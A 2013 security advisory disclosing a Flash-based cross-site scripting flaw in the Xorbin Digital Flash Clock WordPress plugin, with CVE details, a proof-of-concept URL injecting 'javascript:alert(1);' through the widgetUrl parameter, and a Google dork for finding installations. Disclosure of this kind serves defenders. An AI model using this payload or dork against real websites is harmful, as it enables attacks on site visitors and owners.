Xorbin Digital Flash Clock plugin version 1.0 for WordPress suffers from a flash-based cross site scripting vulnerability.
52281822ff4a323761052080687530ded283d887d7b6d4c7707929f84c1ef54d
====================================================================
Xorbin Digital Flash Clock 1.0 Plugin for Wordpress Flash-based XSS
====================================================================
Description: This plugin displays digital flash clock on your website. It's easy to use and it's highly customizable.
You can add digital flash clock to your website as a widget and use as many clocks as you like on one page.
Published: 30-06-2013
Version : 1.0
Severity : Low to Moderate
CVSS Score: 5
CVE: 2013-4693
Authors : Prakhar Prasad http://www.prakharprasad.com
Rafay Baloch http://www.rafayhackingarticles.net
Download : http://wordpress.org/plugins/xorbin-digital-flash-clock/
Vendor : XORBin http://www.xorbin.com/
Google Dork: inurl:xorbin-digital-flash-clock
Details:
The vulnerability exists in "xorDigitalClock.swf" file of this plugin, "widgetUrl" parameter is taken from external input and is passed into getURL function.
getURL(_root.widgetUrl, "")
Proof-of-Concept:
http://domain.tld/wordpress/wp-content/plugins/xorbin-digital-flash-clock/media/xorDigitalClock.swf#?widgetUrl=javascript:alert(1);
Clicking on the clock will execute Javascript payload.
Solution:
https://code.google.com/p/doctype-mirror/wiki/ArticleFlashSecurityGetURL